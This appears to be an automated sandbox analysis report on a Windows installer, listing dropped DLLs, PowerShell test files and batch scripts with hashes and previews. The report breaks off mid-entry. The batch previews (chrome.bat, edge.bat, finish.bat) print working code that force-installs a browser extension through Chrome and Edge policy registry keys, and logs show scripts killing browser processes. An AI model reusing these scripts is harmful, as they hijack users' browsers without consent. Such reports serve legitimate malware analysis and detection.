                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI3340.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI3360.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI34E7.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1126208
                                                                                                                                                                            Entropy (8bit):6.47558339310688
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:+BbmgYewSBprKpygTqkg0z/f2sbQEiwiUt5GFD5IqQc3w0RZqTkqMUM0zVQZv:+BflKp/Dz/f2sbQEidUt5Gp5xz3w0RZP
                                                                                                                                                                            MD5:C519803F83155AE74401C90F1F6AD5B1
                                                                                                                                                                            SHA1:5D7DF65F700D0303B924B08F576921CA60479374
                                                                                                                                                                            SHA-256:14C4DECB2BF71C253AECB0C36A768A1CF202F93C1769265C2819D9FF4BC2B349
                                                                                                                                                                            SHA-512:879251E3A07316869F92E1E0F945399BD1C5B451B014C88299076FAA34B7745F5191DB20016EA860EC5FD4756CF99DB9A94DD87C6D710DD609ACC19D88736190
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J"..+L..+L..+L.>YO..+L.>YI.X+L.IUH..+L.IUO..+L.IUI..+L.>YH..+L.>YM..+L..+M..*L..TE..+L..TL..+L..T...+L..+..+L..TN..+L.Rich.+L.........................PE..L....>.d.........."!...$.t..........0u.......................................P............@.........................`...t...............................@=.......A.../..p....................0..........@...............4............................text...^s.......t.................. ..`.rdata...U.......V...x..............@..@.data...8...........................@....rsrc...............................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI3517.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI3566.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI35A6.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):217920
                                                                                                                                                                            Entropy (8bit):6.659990688109136
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:s3mBJDmU1w79thLwNj3xrvkLzDSpjqBIe2c8AOAg0FuDGMxwVb7zY2+fS4P:s3MN9WmHcLz+pjqgAOSMmEfSC
                                                                                                                                                                            MD5:AE9AA65470306DB7DB02371779BBCE64
                                                                                                                                                                            SHA1:6580975408BC4013A5E7A3E717912B30B1CB6294
                                                                                                                                                                            SHA-256:FB7B23455C1BE134A4F89824F1CE45EF7D09A25188B6C726ADA9690C9B28EF33
                                                                                                                                                                            SHA-512:DB36D383DED9DA8C5B0BE211CB3C816787629993015763A5A19067BC86351C65CC4A9ED149416DF47D3DE02EA3CC35803862EA029FBD5059B1633A2630F7A769
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............................................._..............................Q......9...........Rich...........PE..L...A>.d.........."!...$..................... ...............................P.......I....@.....................................<.... ..................@=...0..\.......p...................@...........@............ ...............................text...V........................... ..`.rdata....... ......................@..@.data...4...........................@....rsrc........ ......................@..@.reloc..\....0......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI35E5.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Pro13F3.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):448
                                                                                                                                                                            Entropy (8bit):5.019637372140489
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:XjmBuit97lHl+fvEMmtcEE34+es1phk0/U:XBi/xl+fcMmGDis1M0c
                                                                                                                                                                            MD5:633C65BBEF12B7AD8D062A6DFC25CAF1
                                                                                                                                                                            SHA1:5D3E6E2879DF92D7694D954F162C27F9C80FA8EF
                                                                                                                                                                            SHA-256:E2318AD10C49834F45119B2231E38F34A4AD840BE94B5F212DA9C2BE7939759F
                                                                                                                                                                            SHA-512:D959954D0DAFC6EEAF150924CA71B007AFDCFAE04427EB37E2EE3C13ED443673CCC9DEC2BB5F4D2A6851925BA9D1E2DF71778021E873139DC4EA196E9A4DF399
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Stop-Process : Cannot find a process with the name "msedge". Verify the process name and call the cmdlet again...At C:\Users\user\AppData\Local\Temp\scr1333.ps1:1 char:1..+ Stop-Process -Name 'msedge';..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (msedge:String) [Stop-Process], ProcessCommandException.. + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.StopProcessCommand.. ..

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ProED1B.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):448
                                                                                                                                                                            Entropy (8bit):5.006179910732363
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:XjmBut97lHl+fF9EMRmCFtEE34+es1phk0/U:XB/xl+fFmM9LDis1M0c
                                                                                                                                                                            MD5:DF280E3DFC798D9DEEA723A64D15DA99
                                                                                                                                                                            SHA1:654AB86BF7EA34A7DA25DD81F1FF52D0A12146E2
                                                                                                                                                                            SHA-256:D0CF9A48E490820718FE56224243AE8CCB8294850E04CA7C89480A12C3183F64
                                                                                                                                                                            SHA-512:FE2F13DB2A957B639A5A4B12B77E035A7426099716B90F93A330924BCA3C3829C2F023807037FF49C2247C3A06499D8FD2A354930806D46DD5F8FDE03C9CD51B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Stop-Process : Cannot find a process with the name "chrome". Verify the process name and call the cmdlet again...At C:\Users\user\AppData\Local\Temp\scrECF8.ps1:1 char:1..+ Stop-Process -Name 'chrome';..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : ObjectNotFound: (chrome:String) [Stop-Process], ProcessCommandException.. + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.StopProcessCommand.. ..

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0conodoz.p1d.psm1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ezhapiw.zc3.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agxkquqf.zxt.psm1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amq3vsj0.1es.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_km0ehg4q.qop.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1e3j2xm.4kk.psm1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\chrome.bat

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                            Entropy (8bit):5.163742020740791
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:W46X7oejIT3IUgHI7wjITCIUXHI7OTsuJl821ESJF8svv:W46kejumawjftatshvF8s3
                                                                                                                                                                            MD5:4588743DA052A1FEA1239A511BB364FF
                                                                                                                                                                            SHA1:3D1787890905D230DE092047E2A6292398CCB440
                                                                                                                                                                            SHA-256:CE9ED72627102152193DB5F4A4D7AAFFA6656BC9F9BA0357DAF3AA3F841F8280
                                                                                                                                                                            SHA-512:92C4E084358D29EEE3359C6C3A56DEAF608B2FD968EA1212E3C56A8A6B24814DF104B00A3EC9722D1BFE1EBDA7184272D15E1E473195229C25F021144926AC6C
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:call "%~dp0\config.bat"....set app=Google\Chrome..set ext="%LocalAppdata%\%app%\%ext_dir%\%id%\%version%_0\"....set chrome_exe=%systemdrive%\Program Files\%app%\Application\chrome.exe....if exist "%chrome_exe%" (...REG ADD "%base32%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f...REG ADD "%base32%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f...REG ADD "%base32%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f.....REG ADD "%base64%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f...REG ADD "%base64%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f...REG ADD "%base64%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f.....start "" "%chrome_exe%" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper".....for /l %%x in (1, 1, 20) do (....if not exist %ext% (timeout 2 > NUL) else (echo "Wait")...)..)....timeout 5 > NUL..

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\edge.bat

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):834
                                                                                                                                                                            Entropy (8bit):5.119306354744483
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:/q46XDjI0IuHI7LjIpIxHI7DRJl821ESMLHv:/q46zjzraLj+8a1hqLP
                                                                                                                                                                            MD5:6F5A4776CE5D10F58012519F76D3DD40
                                                                                                                                                                            SHA1:A48376DEC74A2D9C469B5D18156BE7E98AFB810C
                                                                                                                                                                            SHA-256:A144A36CE818D5C33BD5959D008DEA20E2736B87A1874015A560F4D9B85E9741
                                                                                                                                                                            SHA-512:255DEC451AF4CF5E946589BE5834506A60B89ED8703F1013A14B933915955579B9CC0A755C553DB2EB042E1A68AC9AC27E6F6A53DEAA8F6ADC7FD636B3E70D81
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:call "%~dp0\config.bat"....set app=Microsoft\Edge..set ext="%LocalAppdata%\%app%\%ext_dir%\%id%\%version%_0\"....REG ADD "%base32%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base32%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f..REG ADD "%base32%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f....REG ADD "%base64%\Policies\%app%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\%app%\Extensions\%id%" /v "path" /t REG_SZ /d %file% /f..REG ADD "%base64%\%app%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f....start "" "msedge" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"....for /l %%x in (1, 1, 20) do (...if not exist %ext% (timeout 2 > NUL) else (echo "Wait")..)....timeout 5 > NUL..

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\finish.bat

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):450
                                                                                                                                                                            Entropy (8bit):5.035914589492242
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:f8F2Axuq3oidDQkuq3oidDx1G3oidDQkG3oid6:o43Ie3IXITI6
                                                                                                                                                                            MD5:E9224949C67BE20C5129A39BE0B97A99
                                                                                                                                                                            SHA1:116F2D25F2FBDDE03C086499DEC92A17CC972198
                                                                                                                                                                            SHA-256:D553F8DFBF7D04E9C17C7416E3C387BC2BAD4F7C030EB25E2FE2AF0C610840DB
                                                                                                                                                                            SHA-512:AF05AF92488983B88E5D0C5D9D71AC918499010F8A87523F3AA530B695EA96168B81633D4BE39D7C91D15C8C99D2BB7DF795179D79C11F11466255A00D9EF28C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:call "%~dp0\config.bat"....set chrome=Google\Chrome..set msedge=Microsoft\Edge....REG ADD "%base32%\Policies\%chrome%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\Policies\%chrome%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f....REG ADD "%base32%\Policies\%msedge%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\Policies\%msedge%\ExtensionInstallForcelist" /v "1" /t REG_SZ /d %id% /f

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\pss1394.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41576
                                                                                                                                                                            Entropy (8bit):4.059442483069048
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:5WbLVyvvo51AbfOcQ8k1jauBugqlgVOWvjJudHaUtlGZ:20g8TmFplQS/Nyo
                                                                                                                                                                            MD5:318785524FC17E0B068194A184F5F16A
